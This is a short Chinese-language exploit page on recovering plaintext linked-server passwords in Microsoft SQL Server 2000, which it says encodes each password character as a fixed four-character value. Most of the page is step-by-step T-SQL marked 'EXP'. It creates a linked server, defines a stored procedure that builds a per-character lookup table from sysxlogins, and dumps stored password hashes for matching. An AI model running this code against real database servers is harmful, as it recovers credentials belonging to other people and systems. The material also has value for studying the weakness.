MSSQL2000链接服务器的密码破解为明文的漏洞

previous page next page

MSSQL 2000 的linkserver 密码虽然加密了,但是跟存储自已数据库的密码加密方式不一样.他的加密是根据密码的长度来决定的.每个字符加密


每字符生成固定长度4位字符,可以生成后碰撞即可得出,

EXP:

  1. 第一步,先建立一个 linkserver
  2. sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'
  3. 第二步,创建一个表,用于存放计算出来的HASH
  4. create table mssql (list int not null identity (1,1), pass nvarchar(500),code varbinary(256))
  6. sp_dropserver 'dhlinkserver', 'droplogins'
  7. drop table mssql
  8. DROP PROCEDURE pwd
  10. 第三步 创建破解用的存储过程
  11. create   procedure   pwd
  12. @pwd sysname = NULL
  13. AS
  14.     declare @ss varchar(256),@str varchar (256),@getpass varbinary(256)
  16.     truncate table mssql
  17.     create table #t (inetpub nvarchar(500))
  18.     select @ss=@pwd+'abcdefghijklmnopqrstuvwxyz`0123456789-=[]\;,./~!@#$%^&*()_+{}|:<>?'
  19.     declare @index int
  20.     select @index=1
  21.     while (@index <=len(@ss))
  22.     begin
  23.         insert #t(inetpub) select SUBSTRING (@ss,@index,1)
  24.         select @index = @index +1
  25.         select @str=@pwd+inetpub from #t
  26.         exec master.dbo.sp_addlinkedsrvlogin 'dhlinkserver','false',Null,'xxxx',@str
  27.         select @getpass = password from master.dbo.sysxlogins where name ='xxxx'
  28.         insert into mssql(pass,code) values (@str,@getpass)
  29.     end
  30. select list,pass,master.dbo.fn_VarBinToHexStr(code)code from mssql
  31.     drop table #t
  33. 第四步,查询现在数据库里存储的密码
  36. select name,master.dbo.fn_VarBinToHexStr(password)pass from master.dbo.sysxlogins

previous page start next page